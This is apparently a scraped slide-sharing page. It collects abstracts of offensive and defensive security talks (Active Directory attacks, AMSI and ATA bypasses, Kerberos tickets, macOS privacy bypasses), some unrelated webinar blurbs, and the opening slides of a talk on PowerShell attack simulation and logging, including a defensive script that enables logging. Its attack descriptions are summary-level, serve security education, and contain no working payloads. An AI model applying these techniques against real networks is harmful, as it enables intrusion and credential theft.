PSConfEU - Offensive Active Directory (With PowerShell!) - Will Schroeder
This talk covers PowerShell for offensive Active Directory operations with PowerView. It was given on April 21, 2016 at the PowerShell Conference EU 2016.
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It - Nikhil Mittal
The talk I gave at Black Hat USA 2016 on Anti Malware Scan Interface. The talk looks at what good AMSI brings to Windows 10 and various methods of avoiding/bypassing it.
Identifying privilege escalation paths within an Active Directory environment is crucial for a successful red team. Over the last few years, BloodHound has made it easier for red teamers to perform reconnaissance activities and identify these attack paths. When evaluating BloodHound data, it is common to find ourselves having sufficient rights to modify a Group Policy Object (GPO). This level of access allows us to perform a number of attacks, targeting any computer or user object controlled by the vulnerable GPO.
In this talk we will present previous research related to GPO abuses and share a number of misconfigurations we have found in the wild. We will also present a tool that allows red teamers to target users and computers controlled by a vulnerable GPO in order to escalate privileges and move laterally within the environment.
This presentation was given at BSides Austin '15, and is an expanded version of the "I hunt sys admins" Shmoocon firetalk. It covers various ways to hunt for users in Windows domains, including using PowerView.
Operational Security (OPSEC) is one of the most important aspects to consider in Adversary Simulations (usually called "Red Teaming"). When talking about OPSEC, it is common to think about matters like AV/EDR evasion, avoiding "noise" or using built-in/legitimate tools whenever possible. In fact, the scope of the term OPSEC is usually wider than that.
OPSEC usually refers to the identification and protection of data that could be useful for an adversary. In Adversary Simulations, the adversary is the organisation's security team (Blue Team) and the goal is to improve their detection capabilities. This is why the maturity of an organisation should dictate the complexity required to carry out these operations, so that the objectives are met with the minimum effort, as an attacker would do in real life.
For example, for experienced Blue Teams, the mere fact of using legitimate tools such as net.exe (e.g. “net users /domain”) or powershell.exe could be a reason for the whole operation to be discovered, whereas in other organisations or situations these same actions could remain completely unnoticed.
In this presentation we will discuss how you should review and understand your own toolset and procedures in order to gain OPSEC. We will comprehend how to deal with trade-offs, and why understanding your adversary is key in that matter. In addition, sources of detection (disk, memory, network...) and resources commonly employed by defenders (events, hooks, callbacks...) will be explained visually and practically to help you build and improve your operations.
The goal of Understanding and Hiding your Operations is to be a resource for comprehending the meaning of OPSEC and creating awareness in your operations, so that you can successfully face – and improve – experienced security teams and their detection capabilities.
This presentation was given at PSConfEU and covers common privilege escalation vectors for Windows systems, as well as how to enumerate these issues with PowerUp.
[errata] For more information on DCSync and associated permissions, as well as AdminSDHolder and associated permissions, see Sean Metcalf's respective posts at https://adsecurity.org/?p=1729 and https://adsecurity.org/?p=1906 .
"An ACE Up the Sleeve: Designing Active Directory DACL Backdoors" was presented at BlackHat and DEF CON 2017.
Here Be Dragons: The Unexplored Land of Active Directory ACLs - Andy Robbins
Presented by Andy Robbins, Rohan Vazarkar, and Will Schroeder at DerbyCon 7.0: Legacy, in Louisville, Kentucky, 2017.
See the video recording of the presentation here: https://www.youtube.com/watch?v=mfaFuXEiLF4
Abusing Microsoft Kerberos - Sorry you guys don't get it - Benjamin Delpy
Talk by Skip Duckwall and me at BlackHat 2014 USA / Defcon Wall of Sheep.
Kerberos, and new pass-the-* features, like overpass-the-hash and the Golden Ticket.
A follow-on to the Encyclopedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.
Effective security requires a layered approach. If one layer is compromised, the additional layers will (hopefully) stop an attacker from going further. Much of container security has focused on the image build process and providing provenance for the artifacts in a container image, and restricting kernel-level tunables in the container runtime (seccomp, SELinux, capabilities, etc). What if we can detect abnormal behavior in the application and the container runtime environment as well? In this talk, we’ll present Falco - an open source project for runtime security - and discuss how it provides application and container runtime security. We will show how Falco taps Linux system calls to provide low level insight into application behavior, and how to write Falco rules to detect abnormal behavior. Finally we will show how Falco can trigger notifications to stop abnormal behavior, notify humans, and isolate the compromised application for forensics. Attendees will leave with a better understanding of the container security landscape, what problems runtime security solves, & how Falco can provide runtime security and incident response.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour - Soroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
Fantastic Red Team Attacks and How to Find Them - Ross Wolf
Presented at Black Hat 2019
https://www.blackhat.com/us-19/briefings/schedule/index.html#fantastic-red-team-attacks-and-how-to-find-them-16540
Casey Smith (Red Canary)
Ross Wolf (Endgame)
bit.ly/fantastic19
Abstract:
Red team testing in organizations over the last year has shown a dramatic increase in detections mapped to MITRE ATT&CK™ across Windows, Linux and macOS. However, many organizations continue to miss several key techniques that, unsurprisingly, often blend in with day-to-day user operations. One example includes Trusted Developer Utilities, which can be readily available on standard user endpoints, not just developer workstations, and such applications allow for code execution. Also, XSL Script processing can be used as an attack vector as there are a number of trusted utilities that can consume and execute scripts via XSL. And finally, in addition to these techniques, trusted .NET default binaries are known to allow unauthorized execution as well; these include tools like InstallUtil, Regsvcs and AddInProcess. Specific techniques, coupled with procedural difficulties within a team, such as alert fatigue and lack of understanding of environmental norms, make reliable detection of these events near impossible.
This talk summarizes prevalent and ongoing gaps across organizations uncovered by testing their defenses against a broad spectrum of attacks via Atomic Red Team. Many of these adversary behaviors are not atomic, but span multiple events in an event stream that may be arbitrarily and inconsistently separated in time by nuisance events.
Additionally, we introduce and demonstrate the open-sourced Event Query Language for creating high signal-to-noise analytics that close these prevalent behavioral gaps. EQL is event agnostic and can be used to craft analytics that readily link evidence across long sequences of log data. In a live demonstration, we showcase powerful but easy to craft analytics that catch adversarial behavior most commonly missed in organizations today.
20+ ways to bypass your macOS privacy mechanisms - Csaba Fitzl
"TotallyNotAVirus.app" would like to access the camera and spy on you. To protect your privacy, Apple introduced the Transparency, Consent, and Control (TCC) framework that restricts access to sensitive personal resources: documents, camera, microphone, emails, and more. Granting such access requires authorization, and the mechanism's main design concern was clear user consent.
In this talk, we will share multiple techniques that allowed us to bypass this prompt and, as a malicious application, get access to protected resources without any additional privileges or the user's consent. Together, we submitted over 40 vulnerabilities just to Apple over the past year, which allowed us to bypass some parts or the entire TCC. We also found numerous vulnerabilities in third-party apps (including Firefox, Signal, and others), which allowed us to avoid the OS restrictions by leveraging the targeted apps' privileges.
In the first part of the talk, we will give you an overview of the TCC framework, its building blocks, and how it limits application access to private data. We will explore the various databases it uses and discuss the difference between user consent and user intent.
Next, we will go through various techniques and specific vulnerabilities that we used to bypass TCC. We will cover how we can use techniques like process injection, mounting, application behavior, or simple file searches to find vulnerabilities and gain access to the protected resources.
The audience will leave with a solid understanding of the macOS privacy restrictions framework (TCC) and its weaknesses. We believe there is a need to raise awareness on why OS protections are not 100% effective, and in the end, users have to be careful with installing software on their machines. Moreover - as we're going to publish several exploits - red teams will also benefit from the talk.
No locked doors, no windows barred: hacking OpenAM infrastructure - Andrew Petukhov
One of the main functional components of enterprise applications and Internet portals is an authentication and access control system (AuthC/Z). In this presentation, we describe a popular access control system called ForgeRock OpenAM from the external security point of view. We show the scenarios of full enterprise application compromise through complex attacks which employ both LFI and SSRF.
Go Hack Yourself - 10 Pen Test Tactics for Blue Teamers - jasonjfrank
This presentation, given at BSidesPittsburgh 2015, discusses free tools and techniques penetration testers use that can be translated to network defenders for immediate impact and value.
As organizations assess the security of their information systems, the need for automation has become more and more apparent. Not only are organizations attempting to automate their assessments, the need is becoming more pressing to perform assessments centrally against large numbers of enterprise systems. Penetration testers can use this automation to make their post-exploitation efforts more thorough, repeatable, and efficient. Defenders need to understand the techniques attackers are using once an initial compromise has occurred so they can build defenses to stop the attacks. Microsoft's PowerShell scripting language has become the de facto standard for many organizations looking to perform this level of distributed automation. In this presentation James Tarala, of Enclave Security, will describe to students the enterprise capabilities PowerShell offers and show practical examples of how PowerShell can be used to perform large scale penetration tests of Microsoft Windows systems.
Malicious PowerShell scripts are on the rise, as attackers are using the framework’s flexibility to download their payloads, traverse through a compromised network, and carry out reconnaissance. Symantec analyzed PowerShell malware samples to find out how much of a danger they posed.
Further reading:
PowerShell threats surge: 95.4 percent of analyzed scripts were malicious (https://www.symantec.com/connect/blogs/powershell-threats-surge-954-percent-analyzed-scripts-were-malicious)
The increased use of PowerShell in attacks (https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf)
One thing that most programmers do not take the time to understand is the servers that their application lives on. Most know a smattering of Apache configs, PHP configs, and basic information about the OS. This talk will deal with looking at tools that can help you quickly set up a server and how it can help you be a better developer. We'll look at tools like puppet for server management, OSSEC for log management, different command line tools, and nagios/monit for system monitoring.
The Dark Side of PowerShell by George Dobrea - EC-Council
PowerShell is now a ‘mandatory-to-use’ tool for IT professionals in order to automate administration of the Windows OS and applications, including Azure and Nano Server. Unfortunately, threat actors have recently taken advantage of this powerful scripting language because PowerShell is already installed on your Windows machines, trusted by Admins and most AntiVirus tools! The session presents the steps that should get you started on (Ethical) Hacking and Pen Testing with PowerShell and some new techniques like JEA (Just Enough Administration) that a defender can use in order to limit the effectiveness of PowerShell attacks.
Hacker Halted 2014 - Post-Exploitation After Having Remote Access - EC-Council
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where you have deployed malware on a user’s workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user’s workstation.
I developed (and will publish) two tools that help you in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help you to circumvent the hardware firewall after we can execute code on the server with admin privileges (using a signed kernel driver). My tools are generic, meaning that they work against Windows Server 2012 and Windows 8, and they work with RDP or other remote desktops. The number of problems you can solve with them is endless, e.g., communicating with a bind-shell on a webserver behind a restricted DMZ. Beware, live demo and fun included!
Incorporating PowerShell into your Arsenal with PS>Attack - jaredhaight
This talk serves as a follow up to my Introducing PS>Attack talk and covers some new features that have been added to the tool as well as how to defend an environment against PowerShell based attacks.
Hacking Highly Secured Enterprise Environments by Zoltan Balazs - Shakacon
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where the hacker/penetration-tester has deployed malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows Server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them is endless, e.g., communicating with a bind-shell on a webserver behind a restricted DMZ. Beware, live demo and fun included!
Having been a Penetration Tester for the last 15+ years I have seen many environments and technologies. I have had the pleasure / hell of testing systems I’ve never even heard of and the agony of defeat on a major scale. Instead of just going over what we used to work our way in, I want to go over the tricks the BLUE team used to keep us out! We will go over the technologies and techniques that have turned our traditional paths to root from minutes to months and the tricks that got us “caught” along the way. Not all pentests are a dream and the nightmares CAN / DO happen. So, let’s talk about how YOUR environment can become an attacker's worst nightmare instead of their favorite playground.
Evading Microsoft ATA for Active Directory Domination - Nikhil Mittal
The talk I gave at Black Hat USA 2017 on bypassing Microsoft Advanced Threat Analytics (ATA). I demonstrate techniques to bypass, avoid and attack ATA in this talk.
Continuous intrusion: Why CI tools are an attacker’s best friends - Nikhil Mittal
Slides of the talk I gave at BlackHat Europe and DeepSec 2015. Continuous Integration (CI) tools provide an excellent attack surface due to no or poor security controls, distributed build management capability, and the level of access/privileges they hold in an enterprise.
This talk looks at the CI tools from an attacker's perspective and at using them as portals for getting a foothold and lateral movement. We will see how to execute attacks like command and script execution, credential stealing, and privilege escalation to compromise not only the build process but also the underlying operating system and even entire Windows domains. No memory corruption bugs will be exploited and only the features of the CI tools will be used.
This presentation, given at DeepSec 2014, focuses on using PowerShell for client-side attacks. New scripts which are part of the open-source toolkit Nishang were also released. Nishang is a PowerShell toolkit for penetration testing.
This was a workshop I conducted at Black Hat Europe '12. The workshop explains how to program a USB HID, Teensy++ in this case, for usage in offensive security.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -... - DanBrown980551
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Securing your Kubernetes cluster_ a step-by-step guide to success !KatiaHIMEUR1
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Generating a custom Ruby SDK for your web service or Rails API using Smithyg2nightmarescribd
Have you ever wanted a Ruby client API to communicate with your web service? Smithy is a protocol-agnostic language for defining services and SDKs. Smithy Ruby is an implementation of Smithy that generates a Ruby SDK using a Smithy model. In this talk, we will explore Smithy and Smithy Ruby to learn how to generate custom feature-rich SDKs that can communicate with any web service, such as a Rails JSON API.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...UiPathCommunity
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Essentials of Automations: Optimizing FME Workflows with ParametersSafe Software
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
2. About Me
▪ Hacker, Red Teamer, Trainer, Speaker at http://pentesteracademy.com/
▪ Twitter - @nikhil_mitt
▪ Blog – http://labofapenetrationtester.com
▪ Github - https://github.com/samratashok/
▪ Creator of Kautilya and Nishang
▪ Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems.
▪ Previous Talks and/or Trainings
– DefCon, BlackHat, CanSecWest, BruCON, 44CON and more.
Hacked? Pray that the attacker used PowerShell - IT Defense 2018
3. Agenda
▪ Motivation
▪ Attack simulation using PowerShell
▪ PowerShell ♥ the BlueTeam
▪ Detections using PowerShell v5.1
▪ Bypasses of the detections and detections for the bypasses
▪ Conclusion
4. Motivation
▪ PowerShell v2 comes installed by default in Windows 7.
▪ It provides the ability to interact with Windows components like the Filesystem, Registry, Active Directory, COM, WMI, Windows API and .NET on local as well as remote boxes, in-memory execution of scripts as a built-in feature, and extension of its abilities by using .NET classes, all without leaving any logs on the target system.
▪ Improvements in Windows PowerShell v5 have made it one of the most logged scripting languages across platforms.
▪ I have been using PowerShell for Red Teaming for the past 7 years and recently for Purple Teaming, and increasingly find it equally useful for defense as well!
5. Attack Simulation with PowerShell
Initial Compromise
6. Initial Compromise
▪ Using client side attacks is a popular and fruitful method for getting a foothold machine. There are many well known file types that can be used to launch a PowerShell payload.
– Office Documents (Word, Excel, PowerPoint, Access, RTF etc.)
– HTA, CHM, JS
– Scriptlets (used with regsvr32)
7. Domain Enumeration
▪ Once we have access as a domain user, we can begin with enumeration of the domain and gather situational awareness.
▪ After gathering enough information about the target domain, we look for privileges on other machines to escalate our privileges locally.
8. Domain Privilege Escalation
▪ So, we spotted a machine where domain admin credentials are
present and we have local admin privileges.
▪ Once again, PowerShell helps us here by providing the ability to
execute Mimikatz completely in memory.
9. DEMO - Attack simulation with PowerShell
10. Popular but useless "Security Controls"
▪ PowerShell script execution policy
▪ Blocking or removing powershell.exe
▪ Not updating PowerShell hoping that an adversary will not get an updated "attack tool".
11. PowerShell ♥ the Blue Team
▪ Microsoft fights back with PowerShell v5.1
– System-wide transcription
– Enhanced logging
– AMSI
– Constrained PowerShell
– Protected Event Logging
– JEA
Reference: https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/
12. PowerShell ♥ the Blue Team - System-wide Transcription
▪ Enables transcription (console logging) for everything (powershell.exe, PowerShell ISE, custom hosts - .NET DLL, msbuild, installutil etc.) which uses the PowerShell engine.
▪ Can be enabled using Group Policy (Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell Transcription). By default transcripts are saved in the user's "My Documents" directory.
▪ HKLM:\Software\Policies\Microsoft\Windows\PowerShell\Transcription is the Registry key. Set EnableTranscripting to 1. (See Enable-PSTranscription in the referred blog)
13. PowerShell ♥ the Blue Team - System-wide Transcription
14. PowerShell ♥ the Blue Team - System-wide Transcription
▪ The transcripts are written as text files and can quickly grow in size because the command output is also recorded. It is always recommended to forward the transcripts to a log system to avoid tampering and running out of disk space.
▪ Known problems - Too many logs in an enterprise level network. Enabling transcripts on a DC breaks the Active Directory Administrative Center GUI application.
15. PowerShell ♥ the Blue Team - Enhanced Logging
Script block logging
▪ Logs contents of all the script blocks processed by the PowerShell engine regardless of the host used.
▪ Can be enabled using Group Policy (Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell Script Block Logging). Logs to Microsoft-Windows-PowerShell/Operational.
▪ By default only the first execution of a script block is logged (Verbose, Event ID 4104). Set "Log script block invocation start / stop events" to also log the start and stop of scripts as Event IDs 4105 and 4106. (Multi-fold increase in the number of logs)
16. PowerShell ♥ the Blue Team - Enhanced Logging
Script block logging
▪ HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging is the Registry key. Set EnableScriptBlockLogging to 1. (See Enable-PSScriptBlockLogging in the referred blog)
▪ PowerShell v5 onwards automatically logs (Warning level, Event ID 4104) some suspicious script blocks based on a list of suspicious commands. See: https://github.com/PowerShell/PowerShell/blob/v6.0.0-alpha.18/src/System.Management.Automation/engine/runtime/CompiledScriptBlock.cs#L1612-L1660
▪ It also records the original obfuscated code as well as the decoded and de-obfuscated code.
17. PowerShell ♥ the Blue Team - Enhanced Logging
18. PowerShell ♥ the Blue Team - Enhanced Logging
Module logging
▪ Available since PowerShell v3, module logging logs pipeline execution and command execution events.
▪ Can be enabled using Group Policy (Administrative Templates -> Windows Components -> Windows PowerShell -> Turn on Module Logging). Use "*" to log for all modules. Logs to Microsoft-Windows-PowerShell/Operational with Event ID 4103.
▪ HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging is the Registry key. Set EnableModuleLogging to 1.
▪ HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames is the Registry key. Create a value named * and set it to * for all modules.
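The three registry-based switches from slides 12, 16 and 18 can be applied on a single host without Group Policy, for example on a lab box before testing the detections that follow. The function below is an added example and is not code from the slides or the referenced blog; it assumes an elevated Windows PowerShell 5.1 session, and the OutputDirectory value name for transcription is taken from the Group Policy template rather than from the slides.

```powershell
# Added example (not from the slides): enable the PowerShell v5 logging features
# discussed above by writing the policy registry values that Group Policy would set.
# Run from an elevated Windows PowerShell 5.1 session on the host you want to audit.

function Enable-PSLoggingPolicies {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        # Directory where transcripts are written; point it at a share that your
        # log collector forwards, so transcripts cannot be tampered with locally (slide 14).
        [string]$TranscriptDirectory = 'C:\PSTranscripts',

        # Also log script block start/stop (Event IDs 4105/4106). Off by default because of volume.
        [switch]$LogInvocation
    )

    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    # Slide 12: system-wide transcription
    $transcription = Join-Path $base 'Transcription'
    # Slide 16: script block logging (Event ID 4104, plus 4105/4106 with invocation logging)
    $scriptBlock   = Join-Path $base 'ScriptBlockLogging'
    # Slide 18: module logging (Event ID 4103). 64-bit hosts read this path; the
    # Wow6432Node path listed on the slide is the one 32-bit hosts read.
    $moduleLogging = Join-Path $base 'ModuleLogging'
    $moduleNames   = Join-Path $moduleLogging 'ModuleNames'

    foreach ($key in @($transcription, $scriptBlock, $moduleLogging, $moduleNames)) {
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    }

    if ($PSCmdlet.ShouldProcess($transcription, 'enable transcription')) {
        if (-not (Test-Path $TranscriptDirectory)) {
            New-Item -ItemType Directory -Path $TranscriptDirectory | Out-Null
        }
        Set-ItemProperty -Path $transcription -Name EnableTranscripting -Value 1 -Type DWord
        Set-ItemProperty -Path $transcription -Name OutputDirectory -Value $TranscriptDirectory -Type String
    }
    if ($PSCmdlet.ShouldProcess($scriptBlock, 'enable script block logging')) {
        Set-ItemProperty -Path $scriptBlock -Name EnableScriptBlockLogging -Value 1 -Type DWord
        Set-ItemProperty -Path $scriptBlock -Name EnableScriptBlockInvocationLogging `
            -Value ([int]$LogInvocation.IsPresent) -Type DWord
    }
    if ($PSCmdlet.ShouldProcess($moduleLogging, 'enable module logging for all modules')) {
        Set-ItemProperty -Path $moduleLogging -Name EnableModuleLogging -Value 1 -Type DWord
        # A value named "*" with data "*" logs every module (slide 18).
        Set-ItemProperty -Path $moduleNames -Name '*' -Value '*' -Type String
    }
}

# Read the settings back so the change can be verified now and audited for tampering later.
function Get-PSLoggingPolicies {
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    [pscustomobject]@{
        Transcription      = (Get-ItemProperty "$base\Transcription" -ErrorAction SilentlyContinue).EnableTranscripting
        ScriptBlockLogging = (Get-ItemProperty "$base\ScriptBlockLogging" -ErrorAction SilentlyContinue).EnableScriptBlockLogging
        ModuleLogging      = (Get-ItemProperty "$base\ModuleLogging" -ErrorAction SilentlyContinue).EnableModuleLogging
    }
}

Enable-PSLoggingPolicies -TranscriptDirectory 'C:\PSTranscripts'
Get-PSLoggingPolicies
```

The policy values are read by the engine at startup, so a session that is already open keeps its old settings until it is restarted.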
19. PowerShell ♥ the Blue Team - Enhanced Logging
Module logging
20. PowerShell ♥ the Blue Team - Enhanced Logging
▪ Warning level script block logging checks only for a known list of suspicious commands.
▪ Large number of logs for script block logging. Even more if invocation of script blocks is logged.
▪ Huge number of logs when module logging is enabled.
21. PowerShell ♥ the Blue Team - AMSI
▪ AMSI (AntiMalware Scan Interface) provides the registered antivirus access to the contents of a script before execution.
▪ This allows detection of malicious scripts regardless of the input method (disk, encodedcommand, in-memory).
▪ Enabled by default on Windows 10 and supported by Windows Defender.
▪ Known problem: AMSI has no detection mechanism of its own. It is dependent on the signature based detection by the registered antivirus.
22. PowerShell ♥ the Blue Team - AMSI
23. PowerShell ♥ the Blue Team - Constrained PowerShell
▪ Language mode in PowerShell is used to control access to different elements for a PowerShell session.
